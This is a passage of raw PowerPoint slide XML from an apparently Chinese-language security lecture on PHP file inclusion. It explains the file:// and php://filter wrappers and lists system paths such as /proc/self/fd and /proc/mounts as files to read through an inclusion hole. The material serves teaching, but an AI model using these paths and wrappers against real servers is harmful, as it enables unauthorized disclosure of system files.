              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/self/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[0-9]*(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件标识符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/mounts </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>porc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>config.gz</a:t>
            </a:r>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59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307830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zh-CN" altLang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>参考：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www.cnblogs.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LittleHann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/p/3665062.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>1) file:// — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="is-IS" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>访问本地文件系统</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件系统是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>使用的默认封装协议，展现了本地文件系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file_get_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>solution.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="mr-IN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>var_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>res</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>://filter -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对本地磁盘文件进行读写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>://filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>是一种元封装器，设计用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>数据流打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>筛选过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>应用。这对于一体式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(all-in-one)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的文件函数非常有用，类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>readfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>file_get_contens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，在数据流内容读取之前没有机会应用其他过滤器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
